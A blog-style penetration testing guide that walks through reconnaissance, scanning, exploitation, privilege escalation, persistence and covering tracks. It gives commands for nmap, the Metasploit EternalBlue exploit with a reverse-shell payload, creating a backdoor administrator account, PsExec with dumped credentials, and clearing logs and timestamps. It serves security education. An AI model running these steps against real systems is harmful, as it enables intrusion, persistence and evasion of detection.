The Red Team Playbook: From Reconnaissance to Root – A Professional Penetration Testing Guide

Listen to this Post

Featured Image

Introduction:

Penetration testing, often called ethical hacking, is a systematic process of probing for and exploiting vulnerabilities in a controlled environment to strengthen an organization’s security posture. As Muhammad Fazriansyah’s recent project exemplifies, this practice is critical for identifying weaknesses before malicious actors can. This guide will walk through the core phases of a professional penetration test, providing the technical commands and methodologies used by red teamers worldwide.

Learning Objectives:

  • Understand and execute the key phases of a penetration test, from initial reconnaissance to post-exploitation.
  • Utilize essential tools for scanning, vulnerability assessment, and exploitation on both Linux and Windows platforms.
  • Learn fundamental techniques for maintaining access and covering tracks, and how to defend against them.

You Should Know:

1. The Art of Passive and Active Reconnaissance

Before any attack can be launched, a penetration tester must gather intelligence. This phase involves collecting public information without directly interacting with the target (passive) and then actively probing the target’s systems to map out the attack surface.

Step‑by‑step guide explaining what this does and how to use it.
Passive Reconnaissance (OSINT): Use tools like `theHarvester` to gather emails, subdomains, and IP addresses from public sources.

Command: `theHarvester -d target-company.com -b google,linkedin`

Active Reconnaissance (Network Scanning): Use `Nmap` to discover live hosts, open ports, and running services. This is the first direct interaction with the target network.
Basic Scan: `nmap -sS -A -T4 target-ip` (This performs a SYN scan, OS/version detection, and script scanning).
UDP Scan: `nmap -sU -p 53,123,161 target-ip` (Scans for open UDP ports, which are often overlooked).

2. Vulnerability Analysis and Scanning

Once you have a list of active hosts and services, the next step is to identify known vulnerabilities. Automated scanners can quickly surface common issues, but manual analysis is required for complex flaws.

Step‑by‑step guide explaining what this does and how to use it.
Automated Scanning: Tools like `Nessus` or `OpenVAS` provide comprehensive vulnerability assessments. They cross-reference the discovered services with massive databases of known vulnerabilities (CVEs).
While these are largely GUI-based, you can run OpenVAS from the command line to start a scan: `omp -u username -w password –target=”Target Name” –config=”Full and fast”`
Manual Analysis: For web applications, use `Burp Suite` or `OWASP ZAP` to intercept requests, fuzz parameters, and test for vulnerabilities like SQL Injection and Cross-Site Scripting (XSS). This involves manually manipulating HTTP requests to observe unexpected behavior.

3. Gaining Initial Foothold: Exploitation

This is the phase where identified vulnerabilities are actively exploited to gain unauthorized access to a system. This could be through a web application flaw, a network service exploit, or a social engineering campaign.

Step‑by‑step guide explaining what this does and how to use it.
Metasploit Framework: This is the quintessential exploitation tool. It provides a vast collection of exploit modules and payloads.
Steps to exploit a known SMB vulnerability on a Windows host:

1. `msfconsole` (Launch Metasploit)

2. `search eternalblue` (Search for the exploit)

3. `use exploit/windows/smb/ms17_010_eternalblue`

4. `set RHOSTS target-ip`

5. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`

6. `set LHOST your-ip`

7. `exploit`

Standalone Exploits: Sometimes, you may need to run a public Proof-of-Concept (PoC) exploit written in Python or C.

Example: `python3 exploit.py -t target-ip -p 80`

4. Post-Exploitation and Privilege Escalation

Gaining a shell is often just the beginning. The next goal is to increase privileges from a standard user to a system or root administrator and then gather valuable data.

Step‑by‑step guide explaining what this does and how to use it.

Windows Privilege Escalation:

Information Gathering: Use Meterpreter’s `getsystem` or run Windows commands via a shell.

`whoami /priv` (View current user privileges)

`systeminfo` (Get detailed system information)

Automated Scripts: Run tools like `WinPEAS` or `PowerSploit` to automatically find common misconfigurations.

Linux Privilege Escalation:

SUID Binaries: Find binaries with the SUID bit set, which can be exploited.

`find / -perm -u=s -type f 2>/dev/null`

Kernel Exploits: Use scripts like `Linux Exploit Suggester` to find suitable kernel exploits for the target system.

5. Maintaining Persistence and Lateral Movement

To simulate an advanced attacker, a penetration tester must maintain access and move laterally across the network to access critical systems.

Step‑by‑step guide explaining what this does and how to use it.
Persistence on Windows: Add a user or schedule a task to call back at regular intervals.
Add user: `net user backdooruser P@ssw0rd! /add && net localgroup administrators backdooruser /add`
Metasploit: Use the `persistence` module within a Meterpreter session.
Lateral Movement: Use credentials dumped from the initial system to access other machines via PsExec or WMI.
Metasploit PsExec: `use exploit/windows/smb/psexec` and set the `SMBUser` and `SMBPass` to the dumped hashes/passwords.

6. Covering Tracks (For Awareness and Defense)

A professional pentest includes demonstrating how an attacker can hide their activity. Understanding this is crucial for building effective defenses and detection mechanisms.

Step‑by‑step guide explaining what this does and how to use it.
Clearing Logs: On both Windows and Linux, attackers will attempt to clear event logs.

Windows (via Meterpreter): `clearev`

Linux: `history -c && history -w` (Clear command history) and then manually remove entries from `/var/log/` files like `auth.log` and syslog.
Timestomping: Attackers may alter the timestamps of files they create or modify to blend in. In Meterpreter, this can be done with the `timestomp` command.

What Undercode Say:

  • A successful penetration test is 20% tools and 80% methodology and critical thinking. The tools are enablers, but the value comes from the tester’s ability to chain vulnerabilities and think like an advanced adversary.
  • The ultimate goal is not just to “get root,” but to provide a clear, actionable roadmap for the client to improve their defensive posture, prioritizing risks based on business impact.

The landscape depicted in this guide underscores a fundamental shift in cybersecurity: reactive defense is no longer sufficient. Organizations must proactively assume breach and test their defenses continuously. The technical steps—from leveraging EternalBlue to clearing logs—are not just academic; they are the literal playbook of modern ransomware groups and state-sponsored actors. By understanding and replicating these tactics, red teams provide the only true measure of an organization’s resilience. The increasing demand for skilled professionals like Muhammad Fazriansyah is a direct market response to this escalating threat.

Prediction:

The increasing sophistication of automated penetration testing tools integrated with AI will democratize offensive security, allowing smaller teams to conduct more thorough assessments. However, this will be a double-edged sword, as the same AI-powered tools will be weaponized by malicious actors to find and exploit vulnerabilities at an unprecedented scale and speed. The future of cybersecurity will be an AI-augmented arms race between red and blue teams, making continuous, intelligent testing not just a best practice, but a core requirement for organizational survival.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Fazriansyahmuh Pentest – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky